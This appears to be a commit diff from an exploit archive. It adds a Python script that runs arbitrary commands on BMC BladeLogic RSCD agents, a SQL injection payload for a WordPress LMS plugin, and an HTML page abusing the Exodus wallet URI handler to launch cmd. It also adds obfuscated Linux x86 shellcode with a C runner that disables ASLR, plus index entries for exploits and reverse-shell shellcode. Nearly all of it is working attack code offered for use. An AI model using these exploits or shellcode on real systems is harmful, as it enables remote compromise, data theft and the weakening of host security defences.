# https://github.com/NickstaDB/PoC/tree/master/BMC_RSCD_RCE
import socket
import ssl
import sys
import argparse
import requests
import httplib
from requests.packages.urllib3 import PoolManager
from requests.packages.urllib3.connection import HTTPConnection
from requests.packages.urllib3.connectionpool import HTTPConnectionPool
from requests.adapters import HTTPAdapter
class MyHTTPConnection(HTTPConnection):
def __init__(self, unix_socket_url, timeout=60):
HTTPConnection.__init__(self, HOST, timeout=timeout)
self.unix_socket_url = unix_socket_url
self.timeout = timeout
def connect(self):
self.sock = wrappedSocket
class MyHTTPConnectionPool(HTTPConnectionPool):
def __init__(self, socket_path, timeout=60):
HTTPConnectionPool.__init__(self, HOST, timeout=timeout)
self.socket_path = socket_path
self.timeout = timeout
def _new_conn(self):
return MyHTTPConnection(self.socket_path, self.timeout)
class MyAdapter(HTTPAdapter):
def __init__(self, timeout=60):
super(MyAdapter, self).__init__()
self.timeout = timeout
def get_connection(self, socket_path, proxies=None):
return MyHTTPConnectionPool(socket_path, self.timeout)
def request_url(self, request, proxies):
return request.path_url
def optParser():
parser = argparse.ArgumentParser(
description="Remote exec " +
"BladeLogic Server Automation RSCD agent"
)
parser.add_argument("host", help="IP address of a target system")
parser.add_argument(
"-p",
"--port",
type=int,
default=4750,
help="TCP port (default: 4750)"
)
parser.add_argument("command", help="Command to execute")
opts = parser.parse_args()
return opts
def sendXMLRPC(host, port, packet, tlsrequest):
r = tlsrequest.post(
'http://' + host + ':' + str(port) + '/xmlrpc', data=packet
)
print r.status_code
print r.content
return
intro = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.intro</methodName><params><param><value>2016-1-14-18-10-30-3920958</value></param><param><value>7</value></param><param><value>0;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;</value></param><param><value>8.6.01.66</value></param></params></methodCall>"""
options = optParser()
rexec = options.command
PORT = options.port
HOST = options.host
rexec = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteExec.exec</methodName><params><param><value>""" + rexec + """</value></param></params></methodCall>"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
sock.sendall("TLSRPC")
wrappedSocket = ssl.wrap_socket(sock)
adapter = MyAdapter()
s = requests.session()
s.mount("http://", adapter)
sendXMLRPC(HOST, PORT, intro, s)
sendXMLRPC(HOST, PORT, rexec, s)
wrappedSocket.close()

17
exploits/php/webapps/43901.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Good LMS - Learning Management System WP Plugin SQL
Injection
# Date: 2018-01-24
# Exploit Author: Esecurity.ir
# Exploit Author Web Site: http://esecurity.ir
# Special Thanks : Meisam Monsef [meisamrce@gmail.com] - Telegram ID :
@meisamrce
# Vendor Homepage: https://goodlayers.com/
# Version: All Version
Exploit :
1 - First enter the link below and create an account
http://target.com/?register=1
2 - the exploit
http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+[SQL+Command]%23
http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+union+select+1,2,3,user()%23

4
exploits/windows/remote/43899.html Normal file
View file

@ -0,0 +1,4 @@
<!doctype html>
<script>
window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='
</script>

21
files_exploits.csv
View file

@ -5259,7 +5259,7 @@ id,file,description,date,author,type,platform,port
43780,exploits/macos/dos/43780.c,"macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'",2018-01-19,"Google Security Research",dos,macos,
43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows,
43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows,
43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa & Stefano Farletti",dos,hardware,
43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa",dos,hardware,
43891,exploits/hardware/dos/43891.txt,"Lorex LH300 Series - ActiveX Buffer Overflow (PoC)",2015-01-18,"Pedro Ribeiro",dos,hardware,
40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@ -9005,7 +9005,7 @@ id,file,description,date,author,type,platform,port
38817,exploits/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",local,linux,
38832,exploits/linux/local/38832.py,"RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation",2015-12-01,rebel,local,linux,
38835,exploits/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,local,multiple,
38847,exploits/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa & Stefano Farletti",local,windows,
38847,exploits/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",local,windows,
38871,exploits/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,local,windows,
38903,exploits/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows,
38904,exploits/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows,
@ -9408,7 +9408,7 @@ id,file,description,date,author,type,platform,port
42454,exploits/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Local Privilege Escalation",2017-08-14,Securify,local,macos,
42455,exploits/windows/local/42455.py,"ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows,
42456,exploits/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows,
42460,exploits/osx/local/42460.py,"NoMachine 5.3.9 - Local Privilege Escalation",2017-08-09,"Daniele Linguaglossa & Stefano Farletti",local,osx,
42460,exploits/osx/local/42460.py,"NoMachine 5.3.9 - Local Privilege Escalation",2017-08-09,"Daniele Linguaglossa",local,osx,
42521,exploits/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Local Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",local,windows,
42536,exploits/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows,
42537,exploits/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Code Execution",2017-08-21,"Daniele Votta",local,windows,
@ -15128,7 +15128,7 @@ id,file,description,date,author,type,platform,port
34622,exploits/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",remote,windows,
34647,exploits/windows/remote/34647.txt,"Ammyy Admin 3.5 - Remote Code Execution (Metasploit)",2014-09-13,scriptjunkie,remote,windows,
34654,exploits/windows/remote/34654.c,"SWiSH Max3 - DLL Loading Arbitrary Code Execution",2010-09-20,anT!-Tr0J4n,remote,windows,
34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa & Stefano Farletti",remote,windows,80
34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80
34669,exploits/multiple/remote/34669.rb,"Railo 4.2.1 - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,remote,multiple,80
34670,exploits/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload (Metasploit)",2014-09-15,Metasploit,remote,multiple,8400
34671,exploits/java/remote/34671.rb,"SolarWinds Storage Manager - Authentication Bypass (Metasploit)",2014-09-15,Metasploit,remote,java,9000
@ -15765,7 +15765,7 @@ id,file,description,date,author,type,platform,port
39735,exploits/windows/remote/39735.rb,"Advantech Webaccess Dashboard Viewer - Arbitrary File Upload (Metasploit)",2016-04-26,Metasploit,remote,windows,80
39736,exploits/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",remote,linux,
39742,exploits/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",remote,php,
39755,exploits/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution",2016-05-02,"Daniele Linguaglossa & Stefano Farletti",remote,windows,
39755,exploits/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution",2016-05-02,"Daniele Linguaglossa",remote,windows,
39756,exploits/linux/remote/39756.rb,"Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-05-02,Metasploit,remote,linux,8080
39783,exploits/windows/remote/39783.py,"Dell SonicWALL Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,remote,windows,
39792,exploits/ruby/remote/39792.rb,"Ruby on Rails - Development Web Console (v2) Code Execution (Metasploit)",2016-05-09,Metasploit,remote,ruby,3000
@ -15832,6 +15832,7 @@ id,file,description,date,author,type,platform,port
40474,exploits/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",remote,hardware,
40491,exploits/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,remote,multiple,
40507,exploits/linux/remote/40507.py,"Subversion 1.6.6/1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,remote,linux,
43899,exploits/windows/remote/43899.html,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution",2018-01-25,Wflki,remote,windows,
43588,exploits/windows/remote/43588.py,"SysGauge Server 3.6.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
43589,exploits/windows/remote/43589.py,"Disk Pulse Enterprise 10.1.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,
@ -15964,6 +15965,7 @@ id,file,description,date,author,type,platform,port
43519,exploits/php/remote/43519.rb,"phpCollab 2.5.1 - Unauthenticated File Upload (Metasploit)",2018-01-11,Metasploit,remote,php,
43523,exploits/windows/remote/43523.py,"ALLMediaServer 0.95 - Buffer Overflow",2018-01-11,"Mario Kartone Ciccarelli",remote,windows,
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
43902,exploits/linux/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,linux,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@ -31909,7 +31911,7 @@ id,file,description,date,author,type,platform,port
31164,exploits/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' SQL Injection",2008-02-12,S@BUN,webapps,php,
31258,exploits/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,webapps,ios,
31335,exploits/php/webapps/31335.txt,"MG2 - 'list' Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",webapps,php,
40357,exploits/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa & Stefano Farletti",webapps,hardware,80
40357,exploits/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",webapps,hardware,80
31700,exploits/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,webapps,php,
31701,exploits/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Cross-Site Scripting",2008-04-24,ZoRLu,webapps,php,
31173,exploits/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",webapps,php,80
@ -34110,7 +34112,7 @@ id,file,description,date,author,type,platform,port
34849,exploits/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Local/Remote File Inclusion",2010-01-19,indoushka,webapps,php,
34850,exploits/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,webapps,php,
34851,exploits/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php?jobid' SQL Injection",2014-10-02,wishnusakti,webapps,php,80
34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa & Stefano Farletti",webapps,windows,80
34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",webapps,windows,80
34854,exploits/php/webapps/34854.txt,"WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,webapps,php,80
34858,exploits/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery",2014-10-02,"Krusty Hack",webapps,php,80
34861,exploits/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,webapps,php,80
@ -37183,6 +37185,7 @@ id,file,description,date,author,type,platform,port
40534,exploits/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",webapps,php,
43567,exploits/php/webapps/43567.txt,"ImgHosting 1.5 - Cross-Site Scripting",2018-01-15,"Dennis Veninga",webapps,php,
43569,exploits/php/webapps/43569.txt,"Domains & Hostings Manager PRO 3.0 - Authentication Bypass",2018-01-15,Tauco,webapps,php,
43900,exploits/hardware/webapps/43900.py,"ASUS DSL-N14U B1 Router 1.1.2.3_345 - Change Administrator Password",2018-01-25,"Víctor Calvo",webapps,hardware,
43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,
43591,exploits/php/webapps/43591.txt,"RISE 1.9 - 'search' SQL Injection",2018-01-15,"Ahmad Mahfouz",webapps,php,
43592,exploits/jsp/webapps/43592.txt,"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect",2018-01-15,"Andrew Gill",webapps,jsp,
@ -37271,6 +37274,8 @@ id,file,description,date,author,type,platform,port
43869,exploits/php/webapps/43869.txt,"Flexible Poll 1.2 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43870,exploits/php/webapps/43870.txt,"Professional Local Directory Script 1.0 - SQL Injection",2018-01-24,"Ihsan Sencan",webapps,php,
43872,exploits/php/webapps/43872.html,"WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure",2018-01-24,"ThreatPress Security",webapps,php,
43873,exploits/aspx/webapps/43873.py,"Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure",2018-01-24,"Paul Taylor",webapps,aspx,
43874,exploits/aspx/webapps/43874.py,"Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Arbitrary File Upload",2018-01-24,"Paul Taylor",webapps,aspx,
43883,exploits/windows/webapps/43883.txt,"BMC Track-It! 11.4 - Multiple Vulnerabilities",2015-09-28,"Pedro Ribeiro",webapps,windows,
43884,exploits/hardware/webapps/43884.txt,"Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities",2017-01-31,"Pedro Ribeiro",webapps,hardware,
43885,exploits/hardware/webapps/43885.txt,"SysAid Help Desk 14.4 - Multiple Vulnerabilities",2015-06-10,"Pedro Ribeiro",webapps,hardware,
@ -37282,6 +37287,7 @@ id,file,description,date,author,type,platform,port
43894,exploits/multiple/webapps/43894.txt,"ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities",2015-02-09,"Pedro Ribeiro",webapps,multiple,
43895,exploits/multiple/webapps/43895.txt,"ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download",2014-12-03,"Pedro Ribeiro",webapps,multiple,
43896,exploits/multiple/webapps/43896.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-09,"Pedro Ribeiro",webapps,multiple,
43898,exploits/hardware/webapps/43898.html,"Dodocool DC38 N300 - Cross-site Request Forgery",2018-01-26,"Raffaele Sabato",webapps,hardware,
40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
@ -37916,6 +37922,7 @@ id,file,description,date,author,type,platform,port
41636,exploits/php/webapps/41636.txt,"Secure Download Links - 'dc' SQL Injection",2017-03-19,"Ihsan Sencan",webapps,php,
43350,exploits/php/webapps/43350.txt,"Joomla! Component JB Visa 1.0 - 'visatype' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
43351,exploits/php/webapps/43351.txt,"Joomla! Component Guru Pro - 'promocode' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
43901,exploits/php/webapps/43901.txt,"WordPress Plugin Learning Management System - 'course_id' SQL Injection",2018-01-26,Esecurity.ir,webapps,php,
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -755,6 +755,7 @@ id,file,description,date,author,type,platform
43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86
43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86
43778,shellcodes/arm/43778.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)",2018-01-15,rtmcx,shellcode,arm
43897,shellcodes/linux_x86/43897.nasm,"Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)",2018-01-26,0xAlaufi,shellcode,linux_x86
43890,shellcodes/linux_x86/43890.c,"Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)",2018-01-23,"Hashim Jawad",shellcode,linux_x86
40549,shellcodes/windows_x86-64/40549.c,"Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86

1 id file description date author type platform
755 43773 shellcodes/windows_x86/43773.c Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes) 2010-07-10 John Leitch shellcode windows_x86
756 43774 shellcodes/windows_x86/43774.c Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes) 2009-01-01 d3c0der shellcode windows_x86
757 43778 shellcodes/arm/43778.asm Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes) 2018-01-15 rtmcx shellcode arm
758 43897 shellcodes/linux_x86/43897.nasm Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes) 2018-01-26 0xAlaufi shellcode linux_x86
759 43890 shellcodes/linux_x86/43890.c Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes) 2018-01-23 Hashim Jawad shellcode linux_x86
760 40549 shellcodes/windows_x86-64/40549.c Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes) 2016-10-17 Roziul Hasan Khan Shifat shellcode windows_x86-64
761 40560 shellcodes/windows_x86/40560.asm Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes) 2016-10-17 Fugu shellcode windows_x86

112
shellcodes/linux_x86/43897.nasm Normal file
View file

@ -0,0 +1,112 @@
;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes
;Date : 24 Jan 2018
;Author : 0xAlaufi <m.alaufi@protonmail.com>
;Tested on : Linux/x86 (Ubuntu 12.04.5)
global _start
section .text
_start:
jmp zero2
zero18:
mov al,0x4
jmp zero19
zero1a:
mov al,0x6
jmp zero1b
zeroc:
push 0x72702f2f
jmp zerod
zero12:
push eax
jmp zero13
zero1b:
int 0x80
jmp zero1c
zero1c:
inc eax
jmp zero1d
zerod:
mov ebx,esp
jmp zeroe
zero16:
xor edx,edx
jmp zero17
zero5:
push 0x735f6176
jmp zero6
zero19:
int 0x80
jmp zero1a
zero7:
push 0x6d6f646e
jmp zero8
zeroa:
push 0x6b2f7379
jmp zerob
zero13:
mov dx,0x3a30
jmp zero14
zero10:
int 0x80
jmp zero11
zerob:
push 0x732f636f
jmp zeroc
zero14:
push dx
jmp zero15
zero4:
push 0x65636170
jmp zero5
zero8:
push 0x61722f6c
jmp zero9
zero9:
push 0x656e7265
jmp zeroa
zero15:
mov ecx,esp
jmp zero16
zero11:
mov ebx,eax
jmp zero12
zero6:
push 0x5f657a69
jmp zero7
zero2:
xor eax,eax
jmp zero3
zero3:
push eax
jmp zero4
zerof:
mov al,0x8
jmp zero10
zeroe:
mov cx,0x2bc
jmp zerof
zero17:
inc edx
jmp zero18
zero1d:
int 0x80
jmp zero1e
zero1e:
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x73\xb0\x04\xeb\x24\xb0\x06\xeb\x0a\x68\x2f\x2f\x70\x72\xeb\x0a\x50\xeb\x28\xcd\x80\xeb\x00\x40\xeb\x71\x89\xe3\xeb\x61\x31\xd2\xeb\x63\x68\x76\x61\x5f\x73\xeb\x44\xcd\x80\xeb\xd8\x68\x6e\x64\x6f\x6d\xeb\x23\x68\x79\x73\x2f\x6b\xeb\x0a\x66\xba\x30\x3a\xeb\x0b\xcd\x80\xeb\x24\x68\x6f\x63\x2f\x73\xeb\xbd\x66\x52\xeb\x15\x68\x70\x61\x63\x65\xeb\xcb\x68\x6c\x2f\x72\x61\xeb\x00\x68\x65\x72\x6e\x65\xeb\xcf\x89\xe1\xeb\xb5\x89\xc3\xeb\xa3\x68\x69\x7a\x65\x5f\xeb\xb9\x31\xc0\xeb\x00\x50\xeb\xd5\xb0\x08\xeb\xc2\x66\xb9\xbc\x02\xeb\xf6\x42\xe9\x76\xff\xff\xff\xcd\x80\xeb\x00";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}